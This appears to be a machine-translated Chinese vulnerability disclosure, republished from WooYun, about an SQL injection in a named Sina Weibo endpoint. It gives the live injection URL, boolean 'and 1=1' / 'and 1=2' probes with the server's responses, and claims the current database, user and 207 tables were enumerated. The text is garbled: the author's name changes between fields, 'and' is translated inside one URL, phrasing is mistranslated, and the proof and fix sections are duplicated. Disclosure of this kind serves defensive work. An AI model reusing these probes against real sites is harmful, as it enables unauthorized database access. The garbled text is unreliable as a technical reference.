新浪微博某处SQL注入漏洞
漏洞标题 新浪微博某处SQL注入漏洞 相关厂商 新浪微博 漏洞作者 路人甲 提交时间 2016-05-25 15:27 公开时间 2016-07-10 17:50 漏洞类型 SQL注射漏洞 危害等级 …
漏洞标题
新浪微博某处SQL注入漏洞
相关制造商
新浪微博
漏洞作者
过路人
提交时间
2016-05-25 15: 27
公共时间
2016-07-10 17: 50
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
字符类型注入,数据库帐户权限太高,Mysql
漏洞详细信息
注射点:http://ting.weibo.com/movieapp/emotion/getversion?display=1
http://ting.weibo.com/movieapp/emotion/getversion?display=1和1=1
返回
{'status': 1,'message':'ok','data':'59'}
http://ting.weibo.com/movieapp/emotion/getversion?display=1%20and%201=2
返回
{'status': 1,'message':'ok'}
大部分是注射。
事实证明它实际上是一种获取类型。
当前数据库和用户
漏洞证明:
我没有过多地发布207个musiclib表。
修理计划:
过滤参数。
版权声明:请注明出处。居民A @乌云
当前数据库和用户
漏洞证明:
我没有过多地发布207个musiclib表。
修理计划:
过滤参数。
版权声明:请注明出处。居民A @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 649 )
- 分类:黑客技术
